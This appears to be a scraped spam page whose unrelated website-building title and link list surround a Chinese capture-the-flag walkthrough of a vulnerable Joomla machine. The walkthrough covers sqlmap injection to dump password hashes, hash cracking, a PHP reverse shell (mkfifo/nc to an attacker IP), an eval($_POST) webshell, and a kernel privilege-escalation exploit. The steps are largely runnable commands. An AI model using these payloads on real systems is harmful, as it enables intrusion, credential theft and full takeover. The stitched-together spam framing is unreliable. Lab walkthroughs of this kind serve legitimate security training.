当前位置: 首页 > news >正文

建设可以聊天的网站网站建设前期开发

建设可以聊天的网站,网站建设前期开发,建设银行个人网站官网,手机网站建设计1. 靶机介绍 主要的内容有 sql 注入漏洞、joomla 框架漏洞、ssh 攻击、shell 反弹、提权 信息收集(ip、端口、目录、指纹信息)---利用漏洞---反弹----提权 2. 信息收集 2.1. 扫描存活 ip 192.168.220.134 2.2. 端口扫描 nmap -T4 -A -p- 192.168.220.134 …1. 靶机介绍 主要的内容有 sql 注入漏洞、joomla 框架漏洞、ssh 攻击、shell 反弹、提权 信息收集(ip、端口、目录、指纹信息)---利用漏洞---反弹----提权 2. 信息收集 2.1. 扫描存活 ip 192.168.220.134 2.2. 端口扫描 nmap -T4  -A  -p-  192.168.220.134 通过对端口扫描发现对外开放了 80 端口然后进行访问 还发现了当前主机的 CMS 是 Joomla 2.3. 敏感目录扫描 nikto  -h  192.168.220.134 administrator/index.php 通过对敏感目录扫描可以发现后台管理的登录页面尝试访问 2.4. 通过 joomscan 扫描相关的漏洞 ​ joomscan  --url  http://192.168.220.134​ 2.5. 扫描 joomla存在的漏洞 searchsploit Joomla 3.7.0 结合漏洞的文件名叫 42033.txt查找这个文件所在的具体位置 find / -name  42033.txt 查看文件的内容 cat  /usr/share/exploitdb/exploits/php/webapps/42033.txt 3.漏洞利用 3.1. sql 注入漏洞 sqlmap -u http://localhost/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering] 利用提供的 sqlmap 进行数据库爆破 sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb --tables -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb -T  #__users   --columns -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb -T  #__users   -C name,password   --dump -p list[fullordering] $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 此时获取到账号和密码但是密码被加密了 可以通过 kali 内置的 john 工具进行解密首先需要将密文保存在一个 txt 文件中 vim jop.txt john --show  jop.txt 得到密码是snoopy 用户名admin 登录 3.2. shell 反弹 可以发现这个区域能够写入 php 代码此时可以联想1.可以写一句话木马然后通过蚁剑连接2.进行 shell 反弹此时我们可以先新建一个 shell.php 文件然后写入反弹的 shell ?php system(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.126.138 6666 /tmp/f);? 在 kali 中开启 nc 监听 nc -lvp 6666 接下来需要访问 shell.php 文件 http://192.168.220.134/templates/beez3/shell.php 使用 python 脚本设置命令行 python -c import pty;pty.spawn(/bin/bash) 接下来尝试使用用户提权发现行不通 sudo  -l 可以尝试使用操作系统提权方式,先查看操作系统的版本信息 cat  /etc/issue 3.3. 发现操作系统的漏洞 接下来搜索操作系统的漏洞 searchsploit   Ubuntu 16.04 Privilege Escalation 权限升级 searchsploit -p linux/local/39772.txtcat /usr/share/exploitdb/exploits/linux/local/39772.txt 3.4. 利用操作系统漏洞 需要通过这个 39772.zip 这个压缩包来进行提权 在本地下载这个文件然后通过蚁剑进行上传 首先先需要创建一个 one.php 文件并写入一句话木马 ?php  eval($_POST[123])? 需要访问这个 one.php让木马生效 接下来使用蚁剑来进行连接 进入服务器内容进行压缩包的解压 cd 39772lstar -xvf exploit.tar 3.5. 利用工具进行提权 进入目录并执行文件最后提权成功 cd ebpf_mapfd_doubleput_exploit./compile.sh./doubleput 3.6. 找到最终的 flag 进入/root 目录最终进行提权 cd  /rootcat  the-flag.txt
http://www.dnsts.com.cn/news/76457.html

相关文章:

  • 兴国做网站爬取wordpress文章
  • 柳州高端网站建设个人免费发布信息平台
  • 如何做旅游网站济南智能网站建设咨询电话
  • 如何把网站加入白名单举报网站建设工作总结
  • 网站开发浏览器兼容性网站设置地图
  • 绘画做动作的网站wordpress 开启手机
  • 山东省建设银行网站福州网站设计十年乐云seo
  • 网站盈利模式有哪几种杭州网站推广怎样做
  • 广州外贸网站建站重庆网站建设 吧
  • 大连模板网站制作服务网站格式图片
  • 临沂罗庄建设局网站建站宝盒v8破解版下载
  • 用网站快速免费建网站
  • 河池网站推广网站开发的论文
  • 广平网站建设投资5万的小型加工厂
  • 点击图片跳转到网站怎么做链接怎么管理网站数据库
  • 做网站哪里的服务器速度快青岛外贸网站设计
  • 上海快速建站平台如何选择网站建设公司
  • 网站被盗用广告营销的经典案例
  • 用返利网站做爆款国外网站推广公司
  • 如何在vps上搭建网站自学制作网站难不难
  • 农安县住房城乡建设局网站工商核名官网
  • 基于php的个人网站设计论文台州本地做网站的
  • 做ppt素材的网站网站做qq链接
  • 网站的icp 备案信息网站开发有哪几个阶段
  • php网站开发用什么phpwordpress 全站404
  • app和网站哪个难做互联网公司排名保定
  • 网站个人简介怎么做作风建设简报--门户网站
  • 学校网站 制作科技魏
  • 好的优化网站推广公司网站的icp 备案信息
  • 手机网站建设的公司开发网站如何选需要注意什么问题